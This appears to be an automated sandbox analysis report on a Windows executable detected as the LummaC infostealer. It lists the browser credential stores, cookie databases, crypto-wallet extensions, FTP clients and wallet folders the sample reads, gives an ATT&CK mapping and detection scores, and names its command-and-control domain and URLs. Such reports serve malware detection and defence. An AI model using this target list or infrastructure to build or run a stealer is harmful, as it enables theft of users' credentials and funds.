Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG	Jump to behavior
Source: C:\Users\user\Desktop\yTcaknrrb8.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG	Jump to behavior

Source: Yara match	File source: 00000000.00000003.3079776447.0000000001D3F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.3103534019.0000000001D42000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.3090277095.0000000001D3F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.3079860899.0000000001CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.3079992709.0000000001CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: yTcaknrrb8.exe PID: 2436, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: yTcaknrrb8.exe PID: 2436, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	2 OS Credential Dumping	221 Security Software Discovery	Remote Services	41 Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Deobfuscate/Decode Files or Information	LSASS Memory	21 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
yTcaknrrb8.exe	39%	ReversingLabs	Win32.Trojan.Generic
yTcaknrrb8.exe	48%	Virustotal		Browse

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://begguinnerz.biz/	100%	Avira URL Cloud	malware
https://begguinnerz.biz/ves	100%	Avira URL Cloud	malware
begguinnerz.biz	100%	Avira URL Cloud	malware
https://begguinnerz.biz:443/apiocal	100%	Avira URL Cloud	malware
https://begguinnerz.biz:443/apin.txtPK	100%	Avira URL Cloud	malware
https://begguinnerz.biz/gax	100%	Avira URL Cloud	malware
https://begguinnerz.biz/Z	100%	Avira URL Cloud	malware
https://begguinnerz.biz/pi	100%	Avira URL Cloud	malware
https://begguinnerz.biz/apix	100%	Avira URL Cloud	malware
https://begguinnerz.biz/api	100%	Avira URL Cloud	malware
https://begguinnerz.biz:443/api	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
begguinnerz.biz	104.21.92.91	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
scentniej.buzz	false		high
rebuildeso.buzz	false		high
appliacnesot.buzz	false		high
screwamusresz.buzz	false		high
begguinnerz.biz	true	Avira URL Cloud: malware	unknown
cashfuzysao.buzz	false		high
inherineau.buzz	false		high
prisonyfork.buzz	false		high
hummskitnj.buzz	false		high
https://begguinnerz.biz/api	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	yTcaknrrb8.exe, 00000000.00000003.3037067411.0000000008B5A000.00000004.00000800.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3036994395.0000000008B5D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	yTcaknrrb8.exe, 00000000.00000003.3037067411.0000000008B5A000.00000004.00000800.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3036994395.0000000008B5D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	yTcaknrrb8.exe, 00000000.00000003.3037067411.0000000008B5A000.00000004.00000800.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3036994395.0000000008B5D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://begguinnerz.biz/ves	yTcaknrrb8.exe, 00000000.00000003.3103642301.0000000001D5E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://begguinnerz.biz:443/apin.txtPK	yTcaknrrb8.exe, 00000000.00000003.3090568585.0000000001CC0000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3103760132.0000000001CC0000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3113352753.0000000001CC0000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3080284956.0000000001CC0000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000002.3114349117.0000000001CC0000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3079860899.0000000001CC0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	yTcaknrrb8.exe, 00000000.00000003.3037067411.0000000008B5A000.00000004.00000800.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3036994395.0000000008B5D000.00000004.00000800.00020000.00000000.sdmp	false		high
